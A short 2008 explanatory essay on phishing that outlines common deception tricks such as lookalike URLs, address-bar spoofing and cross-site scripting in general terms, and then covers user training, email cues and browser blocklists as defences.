Phishing
By: Serafin
Sanchez (4/4/08)
In the IT world phishing is an attempt to criminally
and fraudulently acquire sensitive information, such as usernames, passwords
and credit card details, by masquerading as a trustworthy entity in an
electronic communication. EBay, PayPal and online banks are common targets.
Phishing is typically carried out by email or instant messaging, and often
directs users to enter details at a website, although phone contact has also
been used. Phishing is an example of social engineering techniques used to fool
users. Attempts to deal with the growing number of reported phishing incidents
include legislation, user training, public awareness, and technical measures.
Technical
deception designed to make a link in an email misspelled URLs or the use of sub
domains are common tricks used by phishers, such as this example URL, http://www.yourbank.example.com/. Another common trick is to make the
anchor text for a link appear to be valid, when the link actually goes to the
bag guy site, such as http://en.wikipedia.org/wiki/Genuine. Filter evasion phishers
have used images instead of text to make it harder for anti-phishing filters to
detect text commonly used in phishing emails.
Website forgery
is once the victim
visits the website the deception is not over. Some phishing scams use
JavaScript commands in order to alter the address bar. This is done either by
placing a picture of a legitimate URL over the address bar, or by closing the
original address bar and opening a new one with the legitimate URL.
An attacker can
even use flaws in a trusted website's own scripts against the victim. These
types of attacks is known as cross-site scripting are particularly problematic,
because they direct the user to sign in at their bank or service's own web
page, where everything from the web address to the security certificates
appears correct. In reality, the link to the website is crafted to carry out
the attack, although it is very difficult to spot without specialist knowledge.
One
strategy for combating phishing is to train people to recognize phishing
attempts, and to deal with them. Education can be promising, especially where
training provides direct feedback People can take steps to avoid phishing
attempts by slightly modifying their browsing habits. When contacted about an
account needing to be verified, it is a sensible precaution to contact the
company from which the email apparently originates to check that the email is
legitimate. Alternatively, the address that the individual knows is the
company's genuine website can be typed into the address bar of the browser,
rather than trusting any hyperlinks in the suspected phishing message.
Nearly all
legitimate email messages from companies to their customers contain an item of
information that is not readily available to bad guys. Some companies, for
example PayPal, always address their customers by their username in emails, so
if an email addresses the recipient in a generic fashion Dear PayPal customer it is
likely to be an attempt at phishing. Emails from banks and credit card
companies often include partial account numbers. However, recent research has
shown that the public do not typically distinguish between the first few digits
and the last few digits of an account number a significant problem since the
first few digits are often the same for all clients of a financial institution.
People can be trained to have their suspicion aroused if the message does not
contain any specific personal information.
Another popular approach to fighting
phishing is to maintain a list of known phishing sites and to check websites
against the list. Microsoft's IE7 browser, Mozilla Firefox 2.0, and Opera all
contain this type of anti-phishing.